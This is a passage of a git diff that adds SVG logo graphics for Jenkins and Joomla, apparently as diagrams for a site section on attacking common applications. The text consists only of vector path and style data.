134.618,43.098 13,3.6668 24.666,1.3332 3.667,11.3329 -6.667,19.6671 -7.666,1 -10.667,-3.3332 -10.234,-4.9968 -5.433,0.9968 -4.234,-1.6636" + style="fill:#ffffff;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path72" + inkscape:connector-curvature="0" /><path + d="m 134.383,49.768 c 0,0 8.666,3.9992 10,3.666 l -3.666,18.334 4.333,1.666 c 0,0 3,-17.3328 3,-19.3328 0,0 18.666,-1 20.333,-1 0,0 4,7.6668 3,15.6668 l 3.667,-10.6668 0.333,-6 -5.333,-8 -6,-1.3332 -10,0.3332 -3.333,4.3328 -11.667,-1.666 -3.667,-1.334" + style="fill:#dcd9d8;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path74" + inkscape:connector-curvature="0" /><path + d="m 121.284,73.4309 -7.333,18.6671 -7.667,11 c 0,0 1.666,4.667 4,4.667 2.334,0 7.667,0 7.667,0 l 7.333,-2.667 -0.666,-12.3332 -3.334,-19.3339" + style="fill:#ffffff;fill-opacity:1;fill-rule:nonzero;stroke:none" + id="path76" + inkscape:connector-curvature="0" /><path + d="m 122.717,79.768 c 0,0 -9.334,17.9992 -9.334,20.666 0,0 1.666,4 4,3 2.334,-1 7.334,-3.666 7.334,-3.666 l 0,6.333 -11.334,2.334 -7.666,-1 13,-30.667 2.666,-0.334" + style="fill:#dcd9d8;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path78" + inkscape:connector-curvature="0" /><path + d="m 81.9512,123.764 -9.2344,1.004 -8.6672,2.667 0,-3 4.2348,-4.67 13.3332,-6" + style="fill:#ffffff;fill-opacity:1;fill-rule:nonzero;stroke:none" + id="path80" + inkscape:connector-curvature="0" /><path + d="m 67.0508,122.765 c 0,0 10.334,-4.334 13.6672,-3.334 l 0.3316,-3.996 -9.3316,1.996 -5.6672,4 1,1.334" + style="fill:#dcd9d8;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path82" + inkscape:connector-curvature="0" /><path + d="m 134.582,106.63 c -5.656,0.166 -10.766,0.838 -15.24,2.1 0.304,1.834 -0.265,3.634 0.192,4.955 1.247,0.898 3.337,0.884 5.222,1.095 -1.63,0.801 -3.92,1.118 -5.801,0.655 -0.044,1.273 -0.615,2.062 -0.961,3.058 3.18,1.135 10.687,8.576 14.91,6.112 2.012,-1.172 2.867,-7.866 3.023,-11.121 0.13,-2.7 -0.245,-5.424 -1.345,-6.854" + style="fill:#d33833;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path84" + inkscape:connector-curvature="0" /><path + d="m 134.582,106.63 c -5.656,0.166 -10.766,0.838 -15.24,2.1 0.304,1.834 -0.265,3.634 0.192,4.955 1.247,0.898 3.337,0.884 5.222,1.095 -1.63,0.801 -3.92,1.118 -5.801,0.655 -0.044,1.273 -0.615,2.062 -0.961,3.058 3.18,1.135 10.687,8.576 14.91,6.112 2.012,-1.172 2.867,-7.866 3.023,-11.121 0.13,-2.7 -0.245,-5.424 -1.345,-6.854 z" + style="fill:none;stroke:#d33833;stroke-width:2;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" + id="path86" + inkscape:connector-curvature="0" /><path + d="m 107.535,115.876 c -0.015,-0.428 -0.033,-0.859 -0.05,-1.291 -1.766,-1.16 -4.617,-1.146 -6.555,-2.121 2.857,-0.125 5.106,-0.813 7.052,-1.783 -0.043,-1.078 -0.084,-2.155 -0.126,-3.233 -3.237,-2.216 -6.194,-5.516 -10.0052,-7.5941 -1.802,-0.9828 -8.1262,-3.5117 -10.0434,-3.0648 -1.0847,0.2519 -1.1824,1.598 -1.616,2.8668 -0.9238,2.7171 -3.0508,7.0421 -3.2363,11.1321 -0.2363,5.166 -0.7578,13.824 4.8094,12.76 4.4914,-0.857 9.7152,-2.926 13.1925,-4.826 2.125,-1.162 3.354,-2.598 6.578,-2.846" + style="fill:#d33833;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path88" + inkscape:connector-curvature="0" /><path + d="m 107.535,115.876 c -0.015,-0.428 -0.033,-0.859 -0.05,-1.291 -1.766,-1.16 -4.617,-1.146 -6.555,-2.121 2.857,-0.125 5.106,-0.813 7.052,-1.783 -0.043,-1.078 -0.084,-2.155 -0.126,-3.233 -3.237,-2.216 -6.194,-5.516 -10.0052,-7.5941 -1.802,-0.9828 -8.1262,-3.5117 -10.0434,-3.0648 -1.0847,0.2519 -1.1824,1.598 -1.616,2.8668 -0.9238,2.7171 -3.0508,7.0421 -3.2363,11.1321 -0.2363,5.166 -0.7578,13.824 4.8094,12.76 4.4914,-0.857 9.7152,-2.926 13.1925,-4.826 2.125,-1.162 3.354,-2.598 6.578,-2.846 z" + style="fill:none;stroke:#d33833;stroke-width:2;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" + id="path90" + inkscape:connector-curvature="0" /><path + d="m 110.75,109.712 c -0.494,2.814 -1.065,3.617 -0.844,6.072 7.505,5.004 8.914,-8.595 0.844,-6.072" + style="fill:#d33833;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path92" + inkscape:connector-curvature="0" /><path + d="m 110.75,109.712 c -0.494,2.814 -1.065,3.617 -0.844,6.072 7.505,5.004 8.914,-8.595 0.844,-6.072 z" + style="fill:none;stroke:#d33833;stroke-width:2;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" + id="path94" + inkscape:connector-curvature="0" /><path + d="m 121.617,107.431 c 0,0 -2.334,3.334 -0.667,4.334 1.667,1 3.334,-0.001 4.334,1.666 1,1.667 0,2.667 0.333,4.667 0.333,2 2.001,2.334 3.667,2.667 1.666,0.333 6.334,1 7,-0.667 l -2,6 -4,1.333 -12.667,-7.333 -0.667,-3.667 0,-7.333" + style="fill:#ef3d3a;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path96" + inkscape:connector-curvature="0" /><path + d="m 86.6172,96.4309 c -0.4004,5.2021 -0.8242,10.3971 -1.2957,15.5941 -0.7055,7.76 1.864,6.406 8.5906,6.406 1.0274,0 6.3259,-1.225 6.7049,-2 1.818,-3.713 -3.04,-2.888 2.094,-5.688 4.334,-2.363 11.99,1.435 10.239,6.688 -0.98,1.168 -5.106,0.364 -6.585,1.131 -2.604,1.35 -5.208,2.7 -7.8123,4.05 -3.3132,1.719 -10.9707,4.225 -14.5031,1.823 -8.9504,-6.087 0.5649,-21.296 3.7578,-27.6459" + style="fill:#ef3d3a;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path98" + inkscape:connector-curvature="0" /><path + d="m 95.3887,214.532 c -9.0852,2.116 -13.5996,-3.802 -16.3535,-9.94 -2.459,0.596 -1.4805,3.94 -0.8594,5.644 1.6262,4.472 8.1797,10.425 13.5344,9.618 2.3043,-0.347 5.4226,-2.454 3.6785,-5.322" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path100" + inkscape:connector-curvature="0" /><path + d="m 139.655,204.186 c 0.143,-0.006 0.288,-0.011 0.431,-0.017 2.053,-4.265 3.83,-8.783 6.42,-12.548 -1.735,-4.041 -13.138,-7.617 -12.962,-0.361 2.466,1.078 6.723,0.22 8.909,1.597 -1.264,3.469 -3.088,6.422 -2.798,11.329" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path102" + inkscape:connector-curvature="0" /><path + d="m 100.04,204.075 c 1.948,-3.571 2.582,-7.323 5.351,-10.022 1.247,-1.215 3.672,-2.696 2.47,-6.075 -0.281,-0.797 -2.334,-2.574 -3.519,-2.923 -4.329,-1.278 -14.4162,-0.264 -11.0002,5.133 3.5801,-0.167 8.3922,-2.325 11.0682,0.274 -2.055,3.285 -5.7186,9.784 -4.37,13.613" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path104" + inkscape:connector-curvature="0" /><path + d="m 138.03,167.781 c -6.518,-4.187 -13.786,-8.74 -24.466,-7.684 -2.282,1.984 -3.152,6.399 -0.935,9.315 1.154,-1.984 0.429,-5.633 3.645,-6.182 6.06,-1.037 13.113,3.707 17.472,5.365 2.703,4.557 -0.233,6.233 -2.668,9.166 -4.985,6.009 -11.672,13.457 -11.429,22.453 2.015,1.461 2.189,-2.23 2.478,-2.902 2.603,-6.092 9.154,-13.883 13.935,-19.097 1.174,-1.284 3.107,-2.516 3.322,-3.365 0.62,-2.469 -1.613,-5.427 -1.354,-7.069" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path106" + inkscape:connector-curvature="0" /><path + d="m 52.1016,172.189 c -2.043,1.166 -2.5293,6.302 -4.9278,6.448 -3.4277,0.208 -2.8027,-6.663 -2.789,-10.681 -2.3594,2.142 -2.7743,8.737 -1.041,12.124 -1.9754,0.97 -2.8575,-1.07 -3.9532,-1.789 1.4082,10.23 14.9649,4.745 12.711,-6.102" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path108" + inkscape:connector-curvature="0" /><path + d="m 142.18,163.521 c -3.034,-5.775 -7.326,-12.135 -16.229,-12.32 -0.181,1.865 -0.32,4.703 0.01,5.826 6.806,0.654 11.008,4.118 16.219,6.494" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path110" + inkscape:connector-curvature="0" /><path + d="m 99.5266,159.777 c 5.6784,-2.986 16.1144,-3.307 23.8324,-3.081 0.414,-1.691 0.404,-3.78 0.42,-5.842 -9.921,-0.495 -21.651,1.96 -24.2524,8.923" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path112" + inkscape:connector-curvature="0" /><path + d="m 98.4473,154.209 c 3.9267,-9.859 17.4227,-8.724 28.8037,-8.452 -0.501,-1.28 -1.587,-2.792 -2.937,-3.339 -3.647,-1.484 -13.706,-2.61 -18.769,0.079 -3.211,1.707 -5.274,5.564 -7.0333,7.825 -0.8496,1.092 -5.0801,3.881 -0.0644,3.887" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path114" + inkscape:connector-curvature="0" /><path + d="m 137.556,99.8262 c -4.608,-7.8922 -9.017,-15.9981 -14.484,-22.9594 2.292,6.7391 3.273,18.0184 3.619,26.6172 4.795,2.244 8.901,-0.505 10.865,-3.6578" + style="fill:#81b0c4;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path116" + inkscape:connector-curvature="0" /><path + d="m 162.352,71.4609 c -5.159,-1.0328 -8.784,-6.0468 -13.817,-5.725 2.766,3.8993 7.613,5.543 13.817,5.725" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path118" + inkscape:connector-curvature="0" /><path + d="m 164.628,63.3871 c -4.205,-0.4441 -9.144,-1.125 -13.409,-0.7742 2.019,3.084 9.798,2.0199 13.409,0.7742" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path120" + inkscape:connector-curvature="0" /><path + d="m 166.085,56.4262 c -4.726,-0.1024 -10.6,-0.0082 -15.092,0.3687 2.657,2.8539 12.027,1.059 15.092,-0.3687" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path122" + inkscape:connector-curvature="0" /><path + d="m 128.664,37.377 c 0.678,-5.9352 3.031,-11.9489 2.736,-18.4489 -2.613,-0.8812 -4.114,-1.6519 -7.615,-1.6472 -0.247,5.5242 -0.986,13.9691 -0.765,19.2351 1.722,-0.114 4.261,1.2301 5.644,0.861" + style="fill:#dcd9d8;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path124" + inkscape:connector-curvature="0" /><path + d="m 121.045,124.849 c -2.373,-1.549 -4.394,-3.483 -6.673,-5.137 -5.054,-0.25 -7.812,0.35 -11.525,3.252 0.061,0.233 0.434,0.129 0.448,0.415 5.41,-2.411 12.287,0.982 17.75,1.47" + style="fill:#f0d6b7;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path126" + inkscape:connector-curvature="0" /><path + d="m 92.6445,87.9711 c 1.4864,6.441 7.3106,9.7769 12.5995,13.3239 5.459,-6.9282 8.779,-15.838 12.435,-24.436 -8.638,2.6039 -17.464,6.8289 -25.0345,11.1121" + style="fill:#81b0c4;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path128" + inkscape:connector-curvature="0" /><path + d="m 123.02,36.516 c -0.221,-5.266 0.518,-13.7109 0.765,-19.2351 3.501,-0.0047 5.002,0.766 7.615,1.6472 0.295,6.5 -2.058,12.5137 -2.736,18.4489 -1.383,0.3691 -3.922,-0.975 -5.644,-0.861 z M 68.5059,66.4648 C 70.8145,45.2418 74.1582,27.4012 80.291,8.60781 93.9023,4.475 110.311,4.11484 122.342,7.84414 120.133,18.4512 121.098,31.3648 119.807,42.684 c -0.973,8.5078 -0.477,17.068 -1.811,25.748 -14.578,3.0328 -35.1835,0.709 -49.4901,-1.9672 z m 52.9371,1.834 c -0.123,-9.1148 0.408,-18.1058 1.104,-27.232 3.5,0.5254 5.875,0.8762 9.127,1.5891 -1.056,8.7859 -0.926,18.6722 -3.077,26.4441 -2.486,-0.0238 -4.675,0.0289 -7.154,-0.8012 z m 17.755,1.4692 c -1.661,0.3808 -3.595,0.0148 -5.182,-0.016 0.746,-7.4301 2.556,-15.629 3.193,-23.4282 2.497,-0.0777 3.831,1.1 5.885,1.4961 0.11,6.8461 -0.598,16.2781 -3.896,21.9481 z m 26.884,-24.5629 c 5.205,1.264 8.478,7.639 7.022,14.1859 -0.977,4.4 -2.717,12.6852 -4.579,15.5 -1.376,2.082 -5.107,4.8078 -8.086,2.9 -4.846,-3.1031 -13.383,-4.0039 -16.917,-7.7601 1.772,-5.9 2.322,-14.0039 3.053,-21.4797 6.054,-0.3774 13.503,1.666 18.538,-0.5024 -3.515,-1.1386 -8.076,-1.1476 -11.113,-2.807 2.482,-1.1988 8.293,-0.9566 12.082,-0.0367 z M 117.679,76.859 c -3.656,8.598 -6.976,17.5078 -12.435,24.436 C 99.9551,97.748 94.1309,94.4121 92.6445,87.9711 100.215,83.6879 109.041,79.4629 117.679,76.859 z m 9.012,26.625 c -0.346,-8.5988 -1.327,-19.8781 -3.619,-26.6172 5.467,6.9613 9.876,15.0672 14.484,22.9594 -1.964,3.1528 -6.07,5.9018 -10.865,3.6578 z m -10.216,3.63 c -2.071,0.223 -3.829,-2.381 -6.522,-1.255 -0.617,-0.682 -1.178,-1.421 -1.807,-2.087 5.948,-7.1681 8.651,-17.338 13.245,-25.7618 2.465,8.0918 2.181,16.957 2.724,25.7888 -3.387,-0.215 -5.266,3.063 -7.64,3.315 z m -6.569,8.67 c -0.221,-2.455 0.35,-3.258 0.844,-6.072 8.07,-2.523 6.661,11.076 -0.844,6.072 z m -8.949,2.938 c -3.4773,1.9 -8.7011,3.969 -13.1925,4.826 -5.5672,1.065 -5.0457,-7.594 -4.8094,-12.76 0.1855,-4.09 2.3125,-8.415 3.2363,-11.1321 0.4336,-1.2688 0.5313,-2.6149 1.616,-2.8668 1.9172,-0.4469 8.2414,2.082 10.0434,3.0648 3.8112,2.0781 6.7682,5.3781 10.0052,7.5941 0.042,1.078 0.083,2.155 0.126,3.233 -1.946,0.97 -4.195,1.658 -7.052,1.783 1.938,0.975 4.789,0.961 6.555,2.121 0.017,0.432 0.035,0.863 0.05,1.291 -3.224,0.248 -4.453,1.684 -6.578,2.846 z m -33.2136,6.033 c -2.886,-2.93 8.0945,-6.924 11.5906,-7.139 -0.0195,1.854 1.0566,3.602 0.8398,4.932 -4.1523,0.729 -9.6093,0.248 -12.4304,2.207 z m 35.5516,-1.376 c -0.014,-0.286 -0.387,-0.182 -0.448,-0.415 3.713,-2.902 6.471,-3.502 11.525,-3.252 2.279,1.654 4.3,3.588 6.673,5.137 -5.463,-0.488 -12.34,-3.881 -17.75,-1.47 z m 32.632,-9.895 c -0.156,3.255 -1.011,9.949 -3.023,11.121 -4.223,2.465 -11.73,-4.977 -14.91,-6.112 0.346,-0.996 0.917,-1.785 0.961,-3.058 1.881,0.463 4.171,0.146 5.801,-0.655 -1.885,-0.211 -3.975,-0.197 -5.222,-1.095 -0.457,-1.321 0.112,-3.121 -0.192,-4.955 4.474,-1.262 9.584,-1.934 15.24,-2.1 1.1,1.43 1.475,4.154 1.345,6.854 z m -73.0422,8.437 c -0.9063,0.646 -7.0371,8.623 -7.877,8.292 C 43.9141,125.838 33.541,118.273 24.2715,111.118 33.1094,92.1539 36.677,68.9199 37.3074,46.5262 47.4316,41.791 56.3242,34.9648 70.0625,34.252 68.4727,45.5 67.0215,55.5352 66.1191,66.125 c -3.4519,1.4551 -8.4043,-0.066 -11.6347,0.4512 -0.0274,3.8929 4.9336,1.7047 5.3468,4.3226 0.3114,1.9801 -2.7296,2.1301 -1.7394,5.2481 2.5254,-0.918 3.8516,-2.9457 6.5449,-3.7071 2.461,5.384 -0.0344,14.9102 0.3203,19.4102 0.0672,0.8449 0.4219,4.6809 2.3145,4.0078 1.675,-0.5957 -0.0957,-10.2019 0.0879,-14.4609 0.1672,-3.9239 -0.4739,-7.7207 1.1152,-10.184 13.2754,1.807 26.7656,2.975 41.1294,3.3691 -3.16,1.3559 -6.914,2.6391 -11.0298,4.959 -2.2312,1.2578 -9.2644,3.875 -9.9082,5.9942 -1.0273,3.3769 2.6953,5.1757 3.332,8.0707 -6.7011,-3.6547 -8.0085,3.5031 -9.5937,8.5741 -1.4363,4.593 -2.2539,8.024 -2.6063,10.673 -5.7726,2.752 -11.9445,5.539 -16.9132,9.068 z m 67.1792,7.327 c 9.243,4.482 10.909,-16.751 7.286,-23.591 0.56,-2.04 2.486,-2.821 3.272,-4.655 -5.158,-9.2399 -10.887,-17.8649 -16.15,-26.9961 3.915,2.4371 9.507,0.4359 14.114,2.2601 1.684,0.666 2.903,4.5211 4.178,7.6051 3.507,8.4848 7.189,19.1819 8.827,27.2789 0.37,1.845 1.378,5.865 1.152,7.507 -0.403,2.94 -4.392,5.12 -6.421,6.938 -3.738,3.358 -6.092,6.313 -9.991,9.453 -1.581,-2.334 -4.974,-3.902 -6.267,-5.8 z m -88.3179,81.968 c -4.4043,-4.846 -3.4824,-13.926 -2.9492,-20.386 7.9609,5.008 18.5273,-0.396 18.4277,-8.914 3.8008,0.101 1.4199,4.747 0.7324,7.74 -2.2468,9.776 3.7852,20.397 0.2735,29.337 -6.8184,-0.517 -12.42,-3.302 -16.4844,-7.777 z m 31.5137,28.126 c -9.9707,-2.826 -22.7493,-10.071 -26.8465,-19.028 3.1726,0.461 5.375,2.061 8.5047,2.259 1.1828,0.077 2.7324,-0.496 4.0918,-0.158 2.709,0.672 4.9953,6.746 7.039,9.006 1.9922,2.207 4.3867,3.15 6.0254,5.162 1.0528,0.508 2.6094,0.473 2.6692,2.054 -0.4563,0.488 -0.9368,0.86 -1.4836,0.705 z m 51.9032,-2.658 c -10.349,5.839 -27.8661,10.231 -38.8747,4.743 -8.8828,-4.429 -20.8899,-11.757 -24.9836,-21.043 3.8242,-8.961 -1.1328,-17.172 -1.4492,-26.27 -0.168,-4.841 2.2793,-9.067 2.4668,-14.337 -1.3086,-2.159 -5.3067,-2.425 -8.0743,-2.277 -0.9316,4.662 -2.5625,9.902 -7.3632,10.428 -6.793,0.743 -11.7598,-4.879 -12.0684,-10.754 -0.3652,-6.909 5.3066,-18.36 13.3457,-17.565 3.1055,0.307 3.8684,3.42 7.252,3.388 1.8339,-3.659 -2.8289,-4.808 -3.3086,-7.425 -0.125,-0.676 0.3867,-3.318 0.6843,-4.557 1.4602,-6.033 4.7153,-13.841 7.9192,-18.434 4.0664,-5.826 12.0555,-6.704 20.6504,-7.275 1.5351,3.307 7.1902,3.035 10.875,2.17 -4.416,1.749 -8.5215,5.989 -11.9239,9.742 -3.9082,4.306 -7.8671,8.925 -8.0671,14.553 7.3855,-10.246 13.4871,-19.194 26.9168,-23.701 10.1618,-3.408 22.0298,1.562 29.8378,7.045 3.24,2.279 5.174,5.895 7.477,9.205 8.617,12.395 12.638,30.087 11.754,47.235 -0.364,7.072 -0.348,14.12 -2.721,18.878 -2.48,4.975 -10.868,9.426 -15.778,4.926 -0.91,4.838 4.083,7.83 9.948,6.089 -4.182,5.397 -8.571,11.882 -14.515,15.236 z M 144.444,77.1168 c 8.087,4.0203 23.197,10.8211 28.267,-0.0148 1.871,-3.9942 4.066,-10.7461 5.035,-14.8692 1.369,-5.8168 -1.484,-18.043 -7.463,-19.9949 -5.281,-1.7238 -11.443,-1.6188 -17.804,-0.341 -0.749,0.623 -1.583,1.709 -2.166,2.841 -4.542,0.1762 -8.795,-0.2438 -12.383,-2.1109 0.34,-3.359 -1.932,-3.8981 -4.062,-4.5899 -1.579,-6.2609 3.159,-14.4371 2.025,-20.1461 -0.809,-4.0672 -5.813,-4.6961 -9.491,-5.457 -0.12,-2.2602 0.161,-4.14689 0.412,-6.059 -0.841,-3.09883 -4.613,-4.86289 -8.187,-5.29492 -11.759,-1.414064 -29.6133,-2.049221 -40.9239,2.01797 -3.1562,7.74175 -5.6426,17.15785 -8.2715,25.99805 -11.0312,-1.1781 -19.9531,4.7598 -28.364,8.65 -2.9121,1.35 -6.9406,2.0937 -8.0285,4.4117 -1.0547,2.2442 -0.6231,6.5453 -0.8848,10.6082 -0.666,10.377 -1.2363,20.386 -3.9766,31.011 -1.2304,4.7679 -3.375,8.975 -4.8711,13.5691 -1.3828,4.2579 -3.7988,9.5199 -4.4289,13.7659 -0.9343,6.293 4.9914,6.643 8.7805,9.37 5.8574,4.217 10.4551,6.549 16.7988,10.355 1.8789,1.127 7.545,3.98 8.1895,5.294 1.2812,2.605 -2.1992,6.278 -3.1297,8.32 -1.4719,3.229 -2.2395,5.972 -2.4504,9.158 -5.3215,0.841 -9.3555,4.008 -11.7922,7.579 -4.0308,5.91 -6.8262,16.844 -3.3387,25.161 0.2735,0.655 1.6375,1.943 1.8387,2.949 0.3969,1.981 -0.7469,4.615 -0.818,6.722 -0.3664,10.81 1.829,20.124 9.1063,23.384 2.9543,11.769 13.5281,15.682 23.4902,21.531 3.7239,2.186 7.8289,3.583 12.0684,5.143 15.2082,5.597 38.5419,4.543 51.1639,-5.003 5.352,-4.048 13.907,-12.595 16.967,-18.783 8.082,-16.337 7.508,-43.64 1.855,-63.513 -0.76,-2.668 -1.862,-6.59 -3.401,-9.795 -1.073,-2.238 -4.408,-6.716 -4.003,-8.692 0.417,-2.043 7.604,-7.5 9.145,-8.986 2.775,-2.677 8.047,-6.23 8.474,-9.608 0.459,-3.595 -1.584,-8.513 -2.619,-11.982 -3.46,-11.5769 -6.836,-22.2781 -10.759,-32.5992" + style="fill:#231f20;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path130" + inkscape:connector-curvature="0" /><path + d="m 90.491,157.255 c 0.4387,0.584 2.8508,1.471 6.2258,-0.154 0,0 -4,-0.667 -3.6672,-7.336 l -1.6668,0.334 c 0,0 -1.7226,6.047 -0.8918,7.156" + style="fill:#f7e4cd;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path132" + inkscape:connector-curvature="0" /><path + d="m 119.717,99.934 c 0,-1.0121 -0.821,-1.8328 -1.834,-1.8328 -1.012,0 -1.833,0.8207 -1.833,1.8328 0,1.012 0.821,1.834 1.833,1.834 1.013,0 1.834,-0.822 1.834,-1.834" + style="fill:#1d1919;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path134" + inkscape:connector-curvature="0" /><path + d="m 121.55,91.434 c 0,-1.0121 -0.821,-1.8328 -1.834,-1.8328 -1.012,0 -1.833,0.8207 -1.833,1.8328 0,1.0121 0.821,1.834 1.833,1.834 1.013,0 1.834,-0.8219 1.834,-1.834" + style="fill:#1d1919;fill-opacity:1;fill-rule:evenodd;stroke:none" + id="path136" + inkscape:connector-curvature="0" /></g><text + xml:space="preserve" + style="font-size:144px;font-style:normal;font-variant:normal;font-weight:bold;font-stretch:normal;text-align:start;line-height:100%;writing-mode:lr-tb;text-anchor:start;fill:#000000;fill-opacity:1;stroke:none;font-family:Georgia" + x="231.70523" + y="-71.714066" + id="text5675" + sodipodi:linespacing="100%" + transform="scale(1,-1)"><tspan + sodipodi:role="line" + id="tspan5677" + x="231.70523" + y="-71.714066" + style="font-size:144px;font-style:normal;font-variant:normal;font-weight:bold;font-stretch:normal;text-align:start;line-height:100%;writing-mode:lr-tb;text-anchor:start;font-family:Georgia">Jenkins</tspan></text> +</g></svg> +\ No newline at end of file diff --git a/public/diagrams/attacking-common-applications/joomla.svg b/public/diagrams/attacking-common-applications/joomla.svg @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<svg clip-rule="evenodd" stroke-linejoin="round" stroke-miterlimit="1.414" viewBox="0,0,381,79" xmlns="http://www.w3.org/2000/svg"> + <g fill="#3b3a40" transform="translate(-35 -35)"> + <path d="m154 52.3v31.3c0 2.8.2 5.4-2.3 7.3-2.3 1.9-6.2 2.5-10.4 2.5-6.4 0-13.2-1.5-13.2-1.5l-1.5 4s9.5 2 16.4 2.1c5.8.1 10.9-1.2 13.7-4.4 2.3-2.6 3-5.6 2.9-10.7v-30.6z"/> + <path d="m200.7 69.6c-4.2-2.3-9.3-3.5-15.1-3.5-5.7 0-10.8 1.2-15.1 3.5-5.4 2.9-8.1 7.2-8.1 12.6s2.7 9.7 8.1 12.6c4.3 2.3 9.3 3.5 15.1 3.5 5.7 0 10.8-1.2 15-3.5 5.4-2.9 8.1-7.2 8.1-12.6 0-5.5-2.7-9.7-8-12.6m-3.3 22c-3.3 1.9-7.2 2.8-11.8 2.8-4.7 0-8.7-.9-11.9-2.7-3.9-2.2-5.8-5.3-5.8-9.5 0-4.1 2-7.3 5.8-9.5 3.2-1.8 7.2-2.7 11.9-2.7 4.6 0 8.6.9 11.9 2.7 3.8 2.2 5.8 5.4 5.8 9.5-.1 4-2 7.2-5.9 9.4z"/> + <path d="m249.9 69.6c-4.2-2.3-9.3-3.5-15.1-3.5-5.7 0-10.8 1.2-15.1 3.5-5.4 2.9-8.1 7.2-8.1 12.6s2.7 9.7 8.1 12.6c4.3 2.3 9.3 3.5 15.1 3.5 5.7 0 10.8-1.2 15-3.5 5.4-2.9 8.1-7.2 8.1-12.6 0-5.5-2.7-9.7-8-12.6m-3.3 22c-3.3 1.9-7.2 2.8-11.8 2.8-4.7 0-8.7-.9-11.9-2.7-3.9-2.2-5.8-5.3-5.8-9.5 0-4.1 2-7.3 5.8-9.5 3.2-1.8 7.2-2.7 11.9-2.7 4.6 0 8.6.9 11.9 2.7 3.8 2.2 5.8 5.4 5.8 9.5-.1 4-2 7.2-5.9 9.4z"/> + <path d="m317.8 68.8c-3-1.8-6.9-2.7-11.5-2.7-5.9 0-10.6 1.8-14.2 5.4-3.4-3.6-8.2-5.4-14.1-5.4-4.8 0-8.7 1-11.7 2.9v-2.5h-5.3v31.1h5.3v-21.2c.4-1.5 1.4-2.9 3-4.1 2.2-1.5 5-2.3 8.5-2.3 3.1 0 5.7.6 7.9 1.9 2.6 1.5 3.8 3.5 3.8 6.3v19.6h5.2v-19.7c0-2.8 1.2-4.8 3.8-6.3 2.2-1.2 4.9-1.9 8-1.9s5.8.6 8 1.9c2.6 1.5 3.8 3.5 3.8 6.3v19.6h5.3v-18.9c-.1-4.4-2.1-7.8-5.8-10"/> + <path d="m327.7 52.3v45.4h5.3v-45.4z"/> + <path d="m392.1 52.3v35.1h5.3v-35.1z"/> + <path d="m378.2 66.5v5.3c-4.5-3.8-10.5-5.8-17.9-5.8-5.9 0-11 1.1-15.2 3.4-5.2 2.9-7.9 7.1-7.9 12.7 0 5.5 2.7 9.8 8.1 12.6 4.2 2.3 9.3 3.4 15.2 3.4 2.9 0 5.8-.3 8.4-1 3.7-1 6.8-2.4 9.2-4.3v4.8h5.3v-31.1zm-35.4 15.7c0-4.1 2-7.3 5.8-9.5 3.2-1.8 7.3-2.7 12-2.7 5.8 0 10.3 1.4 13.5 4.2 2.8 2.5 4.2 5.7 4.2 9.6v3.7c-2.2 2.5-5.5 4.4-9.7 5.7-2.5.8-5.2 1.2-8 1.2-4.8 0-8.8-.9-12-2.6-3.9-2.3-5.8-5.4-5.8-9.6z"/> + <path d="m394.8 91.8c-3.7 0-4.2 1.9-4.2 3.1s.6 3.1 4.2 3.1c3.7 0 4.2-2 4.2-3.1s-.6-3.1-4.2-3.1z"/> + <path d="m413.8 57.9c0 3.1-2 5.7-5.6 5.7s-5.6-2.6-5.6-5.7 2-5.7 5.6-5.7 5.6 2.6 5.6 5.7zm-10 0c0 2.6 1.6 4.6 4.4 4.6s4.4-2 4.4-4.6-1.6-4.6-4.4-4.6-4.4 2-4.4 4.6zm5.5.7c2.2-.4 2-3.7-.5-3.7h-2.7v5.8h1.1v-2h1l1.6 2h1.2v-.2zm-.5-2.7c1.3 0 1.3 1.9 0 1.9h-1.6v-1.9z"/> + </g> + <g transform="translate(-35 -35)"> + <path d="m51 75.2-1.4-1.4c-4.5-4.5-5.8-10.8-4.2-16.5-4.5-1-7.8-5-7.8-9.8 0-5.5 4.5-10 10-10 5 0 9.1 3.6 9.9 8.4 5.4-1.3 11.3.2 15.5 4.4l.6.6-7.4 7.4-.6-.6c-2.4-2.4-6.3-2.4-8.7 0s-2.4 6.3 0 8.7l16.6 16.6-7.4 7.4-7.8-7.8z" fill="#7ac143"/> + <path d="m59.3 67 16.6-16.6c4.4-4.4 10.8-5.8 16.4-4.2.7-4.9 4.9-8.6 9.9-8.6 5.5 0 10 4.5 10 10 0 5.1-3.8 9.3-8.7 9.9 1.6 5.6.2 11.9-4.2 16.3l-.6.6-7.2-7.4.6-.6c2.4-2.4 2.4-6.3 0-8.7s-6.3-2.4-8.7 0l-16.6 16.6z" 